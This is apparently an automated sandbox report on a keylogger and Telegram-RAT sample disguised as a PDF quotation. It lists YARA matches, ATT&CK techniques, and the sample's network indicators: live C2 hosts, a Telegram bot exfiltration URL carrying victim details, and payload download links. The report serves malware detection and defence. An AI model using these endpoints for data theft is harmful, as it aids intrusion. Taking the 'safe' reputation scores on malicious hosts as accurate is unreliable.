Yara detected Snake Keylogger

Source: Yara match

File source: 0000000A.00000002.2908019258.00000250E20E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Yara detected Telegram RAT

Source: Yara match	File source: 10.2.MSBuild.exe.140000000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.QUOTATION_JULQTRA071244#U00b7PDF.scr.exe.13747dfae18.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.QUOTATION_JULQTRA071244#U00b7PDF.scr.exe.13747daade0.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.QUOTATION_JULQTRA071244#U00b7PDF.scr.exe.13747d82da8.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000A.00000002.2905870763.0000000140002000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2343518240.000001375067E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2339758590.0000013747D81000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: QUOTATION_JULQTRA071244#U00b7PDF.scr.exe PID: 7404, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: MSBuild.exe PID: 8188, type: MEMORYSTR

Yara detected VIP Keylogger

Source: Yara match	File source: 10.2.MSBuild.exe.140000000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.QUOTATION_JULQTRA071244#U00b7PDF.scr.exe.13747dfae18.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.QUOTATION_JULQTRA071244#U00b7PDF.scr.exe.13747daade0.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.QUOTATION_JULQTRA071244#U00b7PDF.scr.exe.13747d82da8.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000A.00000002.2905870763.0000000140002000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2343518240.000001375067E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2339758590.0000013747D81000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: QUOTATION_JULQTRA071244#U00b7PDF.scr.exe PID: 7404, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: MSBuild.exe PID: 8188, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	2 Windows Management Instrumentation	1 DLL Side-Loading	1 DLL Side-Loading	1 Disable or Modify Tools	1 OS Credential Dumping	1 File and Directory Discovery	Remote Services	1 Archive Collected Data	1 Web Service	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 Scheduled Task/Job	1 Scheduled Task/Job	311 Process Injection	2 Obfuscated Files or Information	LSASS Memory	33 System Information Discovery	Remote Desktop Protocol	1 Data from Local System	3 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	1 Scheduled Task/Job	1 Software Packing	Security Account Manager	1 Query Registry	SMB/Windows Admin Shares	1 Email Collection	11 Encrypted Channel	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	1 DLL Side-Loading	NTDS	111 Security Software Discovery	Distributed Component Object Model	Input Capture	1 Non-Standard Port	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	41 Virtualization/Sandbox Evasion	LSA Secrets	1 Process Discovery	SSH	Keylogging	3 Non-Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	311 Process Injection	Cached Domain Credentials	41 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	24 Application Layer Protocol	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	Compile After Delivery	DCSync	1 Application Window Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	Indicator Removal from Tools	Proc Filesystem	1 System Network Configuration Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	21%	Virustotal		Browse

Source	Detection	Scanner	Link
bg.microsoft.map.fastly.net	0%	Virustotal	Browse
investms.vadavo.cloud	0%	Virustotal	Browse
filetransfer.io	3%	Virustotal	Browse
reallyfreegeoip.org	0%	Virustotal	Browse
api.telegram.org	2%	Virustotal	Browse
checkip.dyndns.com	0%	Virustotal	Browse
checkip.dyndns.org	0%	Virustotal	Browse
s22.filetransfer.io	3%	Virustotal	Browse
fp2e7a.wpc.phicdn.net	0%	Virustotal	Browse

URLs

Source	Detection	Scanner	Label	Link
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	0%	URL Reputation	safe
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17	0%	URL Reputation	safe
http://checkip.dyndns.org/	0%	URL Reputation	safe
http://x1.c.lencr.org/0	0%	URL Reputation	safe
http://x1.i.lencr.org/0	0%	URL Reputation	safe
https://stackoverflow.com/q/11564914/23354;	0%	URL Reputation	safe
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install	0%	URL Reputation	safe
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	0%	URL Reputation	safe
http://checkip.dyndns.org/q	0%	URL Reputation	safe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	0%	URL Reputation	safe
https://reallyfreegeoip.org/xml/	0%	URL Reputation	safe
https://stackoverflow.com/q/14436606/23354	0%	URL Reputation	safe
http://checkip.dyndns.org	0%	URL Reputation	safe
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016	0%	URL Reputation	safe
https://reallyfreegeoip.org/xml/8.46.123.33	0%	URL Reputation	safe
https://www.ecosia.org/newtab/	0%	URL Reputation	safe
https://ac.ecosia.org/autocomplete?q=	0%	URL Reputation	safe
https://stackoverflow.com/q/2152978/23354	0%	URL Reputation	safe
https://reallyfreegeoip.org	0%	URL Reputation	safe
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples	0%	URL Reputation	safe
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	0%	URL Reputation	safe
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:367706%0D%0ADate%20a	0%	Avira URL Cloud	safe
https://github.com/mgravell/protobuf-netJ	0%	Avira URL Cloud	safe
https://duckduckgo.com/ac/?q=	0%	Avira URL Cloud	safe
https://api.telegram.org	0%	Avira URL Cloud	safe
https://duckduckgo.com/chrome_newtab	0%	Avira URL Cloud	safe
http://investms.vadavo.cloud	0%	Avira URL Cloud	safe
https://api.telegram.org/bot	0%	Avira URL Cloud	safe
https://duckduckgo.com/ac/?q=	0%	Virustotal		Browse
https://s22.filetransfer.io/storage/download/iiz1WoiTc5zb	0%	Avira URL Cloud	safe
https://api.telegram.org	1%	Virustotal		Browse
http://investms.vadavo.cloud	0%	Virustotal		Browse
https://filetransfer.io/data-package/v4mecse6/download	0%	Avira URL Cloud	safe
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:367706%0D%0ADate%20a	1%	Virustotal		Browse
https://chrome.google.com/webstore?hl=en	0%	Avira URL Cloud	safe
https://api.telegram.org/bot	1%	Virustotal		Browse
http://varders.kozow.com:8081	0%	Avira URL Cloud	safe
https://github.com/mgravell/protobuf-neti	0%	Avira URL Cloud	safe
https://duckduckgo.com/chrome_newtab	0%	Virustotal		Browse
https://s22.filetransfer.io	0%	Avira URL Cloud	safe
https://filetransfer.io	0%	Avira URL Cloud	safe
https://github.com/mgravell/protobuf-netJ	0%	Virustotal		Browse
https://chrome.google.com/webstore?hl=en	0%	Virustotal		Browse
https://s22.filetransfer.io	3%	Virustotal		Browse
http://filetransfer.io	0%	Avira URL Cloud	safe
https://github.com/mgravell/protobuf-neti	0%	Virustotal		Browse
https://www.office.com/	0%	Avira URL Cloud	safe
https://filetransfer.io	3%	Virustotal		Browse
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	0%	Avira URL Cloud	safe
http://filetransfer.io	3%	Virustotal		Browse
http://varders.kozow.com:8081	15%	Virustotal		Browse
https://github.com/mgravell/protobuf-net	0%	Avira URL Cloud	safe
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	0%	Avira URL Cloud	safe
http://filetransfer.io/data-package/v4mecse6/download	0%	Avira URL Cloud	safe
https://www.office.com/	0%	Virustotal		Browse
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	0%	Virustotal		Browse
http://r10.o.lencr.org0#	0%	Avira URL Cloud	safe
https://api.telegram.org/bot/sendMessage?chat_id=&text=	0%	Avira URL Cloud	safe
https://github.com/mgravell/protobuf-net	0%	Virustotal		Browse
https://chrome.google.com/webstore?hl=en8	0%	Avira URL Cloud	safe
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:367706%0D%0ADate%20and%20Time:%2028/07/2024%20/%2001:17:10%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20367706%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D	0%	Avira URL Cloud	safe
http://aborters.duckdns.org:8081	0%	Avira URL Cloud	safe
https://www.office.com/8	0%	Avira URL Cloud	safe
http://anotherarmy.dns.army:8081	100%	Avira URL Cloud	malware
http://51.38.247.67:8081/_send_.php?L	0%	Avira URL Cloud	safe
https://www.office.com/8	0%	Virustotal		Browse
http://r10.i.lencr.org/0	0%	Avira URL Cloud	safe
http://51.38.247.67:8081/_send_.php?L	3%	Virustotal		Browse
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	0%	Virustotal		Browse
http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded	0%	Avira URL Cloud	safe
http://r10.i.lencr.org/0	0%	Virustotal		Browse
http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded	0%	Virustotal		Browse
http://aborters.duckdns.org:8081	12%	Virustotal		Browse
https://api.telegram.org/bot/sendMessage?chat_id=&text=	0%	Virustotal		Browse
http://anotherarmy.dns.army:8081	15%	Virustotal		Browse

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
bg.microsoft.map.fastly.net	199.232.210.172	true	false	0%, Virustotal, Browse	unknown
investms.vadavo.cloud	185.123.204.162	true	true	0%, Virustotal, Browse	unknown
filetransfer.io	188.114.96.3	true	false	3%, Virustotal, Browse	unknown
reallyfreegeoip.org	188.114.97.3	true	true	0%, Virustotal, Browse	unknown
api.telegram.org	149.154.167.220	true	true	2%, Virustotal, Browse	unknown
s22.filetransfer.io	188.114.97.3	true	false	3%, Virustotal, Browse	unknown
fp2e7a.wpc.phicdn.net	192.229.221.95	true	false	0%, Virustotal, Browse	unknown
checkip.dyndns.com	132.226.8.169	true	true	0%, Virustotal, Browse	unknown
checkip.dyndns.org	unknown	unknown	true	0%, Virustotal, Browse	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://s22.filetransfer.io/storage/download/iiz1WoiTc5zb	false	Avira URL Cloud: safe	unknown
https://filetransfer.io/data-package/v4mecse6/download	false	Avira URL Cloud: safe	unknown
http://checkip.dyndns.org/	true	URL Reputation: safe	unknown
http://filetransfer.io/data-package/v4mecse6/download	false	Avira URL Cloud: safe	unknown
https://reallyfreegeoip.org/xml/8.46.123.33	false	URL Reputation: safe	unknown
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:367706%0D%0ADate%20and%20Time:%2028/07/2024%20/%2001:17:10%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20367706%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D	false	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://duckduckgo.com/chrome_newtab	MSBuild.exe, 0000000A.00000002.2914938706.00000250F2109000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:367706%0D%0ADate%20a	MSBuild.exe, 0000000A.00000002.2908019258.00000250E21F5000.00000004.00000800.00020000.00000000.sdmp	false	1%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://duckduckgo.com/ac/?q=	MSBuild.exe, 0000000A.00000002.2914938706.00000250F2109000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://api.telegram.org	MSBuild.exe, 0000000A.00000002.2908019258.00000250E21F5000.00000004.00000800.00020000.00000000.sdmp	false	1%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://github.com/mgravell/protobuf-netJ	QUOTATION_JULQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2339758590.0000013747D33000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_JULQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2343226980.0000013750490000.00000004.08000000.00040000.00000000.sdmp, QUOTATION_JULQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2339758590.0000013747B81000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://investms.vadavo.cloud	MSBuild.exe, 0000000A.00000002.2908019258.00000250E221F000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000A.00000002.2908019258.00000250E22C8000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://api.telegram.org/bot	QUOTATION_JULQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2343518240.000001375067E000.00000004.00000020.00020000.00000000.sdmp, QUOTATION_JULQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2339758590.0000013747D81000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000A.00000002.2905870763.0000000140002000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 0000000A.00000002.2908019258.00000250E21F5000.00000004.00000800.00020000.00000000.sdmp	false	1%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	MSBuild.exe, 0000000A.00000002.2914938706.00000250F2109000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17	MSBuild.exe, 0000000A.00000002.2914938706.00000250F220F000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000A.00000002.2908019258.00000250E221F000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000A.00000002.2914938706.00000250F2489000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000A.00000002.2914938706.00000250F23B3000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000A.00000002.2914938706.00000250F21C2000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000A.00000002.2914938706.00000250F2237000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000A.00000002.2914938706.00000250F2366000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://chrome.google.com/webstore?hl=en	MSBuild.exe, 0000000A.00000002.2908019258.00000250E22FC000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000A.00000002.2908019258.00000250E221F000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000A.00000002.2908019258.00000250E2331000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://varders.kozow.com:8081	QUOTATION_JULQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2343518240.000001375067E000.00000004.00000020.00020000.00000000.sdmp, QUOTATION_JULQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2339758590.0000013747D81000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000A.00000002.2905870763.0000000140002000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 0000000A.00000002.2908019258.00000250E20E1000.00000004.00000800.00020000.00000000.sdmp	false	15%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://github.com/mgravell/protobuf-neti	QUOTATION_JULQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2339758590.0000013747D33000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_JULQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2343226980.0000013750490000.00000004.08000000.00040000.00000000.sdmp, QUOTATION_JULQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2339758590.0000013747B81000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://x1.c.lencr.org/0	MSBuild.exe, 0000000A.00000002.2906657414.00000250E0478000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 0000000A.00000002.2908019258.00000250E22C8000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000A.00000002.2920294754.00000250FA8F6000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://x1.i.lencr.org/0	MSBuild.exe, 0000000A.00000002.2906657414.00000250E0478000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 0000000A.00000002.2908019258.00000250E22C8000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000A.00000002.2920294754.00000250FA8F6000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://s22.filetransfer.io	QUOTATION_JULQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2333864678.0000013737C02000.00000004.00000800.00020000.00000000.sdmp	false	3%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://stackoverflow.com/q/11564914/23354;	QUOTATION_JULQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2339758590.0000013747D33000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_JULQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2343226980.0000013750490000.00000004.08000000.00040000.00000000.sdmp, QUOTATION_JULQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2339758590.0000013747B81000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install	MSBuild.exe, 0000000A.00000002.2914938706.00000250F21C8000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000A.00000002.2914938706.00000250F2212000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000A.00000002.2914938706.00000250F219D000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000A.00000002.2914938706.00000250F2464000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000A.00000002.2914938706.00000250F2341000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000A.00000002.2914938706.00000250F236C000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	MSBuild.exe, 0000000A.00000002.2914938706.00000250F2109000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://checkip.dyndns.org/q	QUOTATION_JULQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2343518240.000001375067E000.00000004.00000020.00020000.00000000.sdmp, QUOTATION_JULQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2339758590.0000013747D81000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000A.00000002.2905870763.0000000140002000.00000040.00000400.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://filetransfer.io	QUOTATION_JULQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2333864678.0000013737BCE000.00000004.00000800.00020000.00000000.sdmp	false	3%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://filetransfer.io	QUOTATION_JULQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2333864678.0000013737B71000.00000004.00000800.00020000.00000000.sdmp	false	3%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	QUOTATION_JULQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2333864678.0000013737B71000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000A.00000002.2908019258.00000250E20E1000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://reallyfreegeoip.org/xml/	QUOTATION_JULQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2343518240.000001375067E000.00000004.00000020.00020000.00000000.sdmp, QUOTATION_JULQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2339758590.0000013747D81000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000A.00000002.2905870763.0000000140002000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 0000000A.00000002.2908019258.00000250E2150000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.office.com/	MSBuild.exe, 0000000A.00000002.2908019258.00000250E2331000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://stackoverflow.com/q/14436606/23354	QUOTATION_JULQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2339758590.0000013747D33000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_JULQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2333864678.0000013737C7F000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_JULQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2343226980.0000013750490000.00000004.08000000.00040000.00000000.sdmp, QUOTATION_JULQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2339758590.0000013747B81000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	MSBuild.exe, 0000000A.00000002.2914938706.00000250F2109000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://github.com/mgravell/protobuf-net	QUOTATION_JULQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2339758590.0000013747D33000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_JULQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2343226980.0000013750490000.00000004.08000000.00040000.00000000.sdmp, QUOTATION_JULQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2339758590.0000013747B81000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	MSBuild.exe, 0000000A.00000002.2914938706.00000250F2109000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://r10.o.lencr.org0#	MSBuild.exe, 0000000A.00000002.2906657414.00000250E0478000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 0000000A.00000002.2908019258.00000250E22C8000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000A.00000002.2920294754.00000250FA8F6000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://checkip.dyndns.org	MSBuild.exe, 0000000A.00000002.2908019258.00000250E20E1000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016	MSBuild.exe, 0000000A.00000002.2914938706.00000250F220F000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000A.00000002.2908019258.00000250E221F000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000A.00000002.2914938706.00000250F2489000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000A.00000002.2914938706.00000250F23B3000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000A.00000002.2914938706.00000250F21C2000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000A.00000002.2914938706.00000250F2237000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000A.00000002.2914938706.00000250F2366000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://api.telegram.org/bot/sendMessage?chat_id=&text=	MSBuild.exe, 0000000A.00000002.2908019258.00000250E21F5000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://www.ecosia.org/newtab/	MSBuild.exe, 0000000A.00000002.2914938706.00000250F2109000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://chrome.google.com/webstore?hl=en8	MSBuild.exe, 0000000A.00000002.2908019258.00000250E22F7000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://aborters.duckdns.org:8081	QUOTATION_JULQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2343518240.000001375067E000.00000004.00000020.00020000.00000000.sdmp, QUOTATION_JULQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2339758590.0000013747D81000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000A.00000002.2905870763.0000000140002000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 0000000A.00000002.2908019258.00000250E20E1000.00000004.00000800.00020000.00000000.sdmp	false	12%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://ac.ecosia.org/autocomplete?q=	MSBuild.exe, 0000000A.00000002.2914938706.00000250F2109000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.office.com/8	MSBuild.exe, 0000000A.00000002.2908019258.00000250E232C000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://51.38.247.67:8081/_send_.php?L	MSBuild.exe, 0000000A.00000002.2908019258.00000250E221F000.00000004.00000800.00020000.00000000.sdmp	false	3%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://anotherarmy.dns.army:8081	QUOTATION_JULQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2343518240.000001375067E000.00000004.00000020.00020000.00000000.sdmp, QUOTATION_JULQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2339758590.0000013747D81000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000A.00000002.2905870763.0000000140002000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 0000000A.00000002.2908019258.00000250E20E1000.00000004.00000800.00020000.00000000.sdmp	false	15%, Virustotal, Browse Avira URL Cloud: malware	unknown
https://stackoverflow.com/q/2152978/23354	QUOTATION_JULQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2339758590.0000013747D33000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_JULQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2343226980.0000013750490000.00000004.08000000.00040000.00000000.sdmp, QUOTATION_JULQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2339758590.0000013747B81000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://reallyfreegeoip.org	MSBuild.exe, 0000000A.00000002.2908019258.00000250E2150000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000A.00000002.2908019258.00000250E21C6000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000A.00000002.2908019258.00000250E21F5000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples	MSBuild.exe, 0000000A.00000002.2914938706.00000250F21C8000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000A.00000002.2914938706.00000250F2212000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000A.00000002.2914938706.00000250F219D000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000A.00000002.2914938706.00000250F2464000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000A.00000002.2914938706.00000250F2341000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000A.00000002.2914938706.00000250F236C000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	MSBuild.exe, 0000000A.00000002.2914938706.00000250F2109000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
